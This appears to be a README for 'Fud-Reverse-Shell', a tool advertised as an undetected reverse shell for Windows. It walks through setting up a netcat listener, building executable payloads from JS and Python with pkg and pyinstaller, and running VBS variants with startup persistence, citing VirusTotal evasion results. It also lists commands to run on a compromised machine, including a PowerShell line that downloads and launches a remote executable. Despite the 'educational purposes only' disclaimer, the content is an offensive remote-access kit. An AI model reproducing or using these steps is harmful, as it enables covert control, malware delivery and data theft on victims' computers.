Fud-Reverse-Shell icon indicating copy to clipboard operation
Fud-Reverse-Shell copied to clipboard

Undetected Reverse Shell


» sample commands

» if you want to know username and file location name type pwd

» Extract from Zip: Expand-Archive -Path C:\Users\{Username}\Downloads\file.zip -DestinationPath C:\Users\{Username}\Downloads\file

» creates new folder: New-Item -ItemType Directory -Path "C:\Users\{Username}\Downloads\New Folder"

» app deletes: Remove-Item "C:\Users\{Username}\Downloads\shell.exe"

» The program downloads: powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://YourDownloadLink/program.exe', 'C:\Users\{Username}\Downloads\Program.exe')"

» Reads inside a file: type File.txt

» Runs the program: powershell -c "Start-Process C:\Users\{Username}\Downloads\downloaded_file.exe"

» Copies the file from one place to another: scp C:\Users\Administrator\Downloads\program.exe C:\Users\Administrator\Desktop\program.exe

» Reverse shell + Windows Startup

» Change the ip address in the codes according to yourself

» Change the 4444 port in the codes according to your own

» if you are using windows you need to download netcat first install netcat

» After downloading open cmd as administrator

» After opening cmd, go to the file location where netcat is located from cmd and type this:

nc64.exe -nvlp Your Port

» if you want to js to exe first Install Node.js

» to make exe from js

npm install pkg

pkg shell.js

» js to exe virustotal result

» runs install_python.bat if python is installed

» if you want to py to exe

» open cmd and type

pip install pyinstaller

pyinstaller --onefile --windowed shell.py

» py to exe virustotal result

» vbs does not need an installation, just double click

» vbs virustotal result


This tool is for educational purposes only. It is coded for you to see how your files are simply stolen and how to take action. Do not use for illegal purposes. We are never responsible for illegal use. Educational purpose only!


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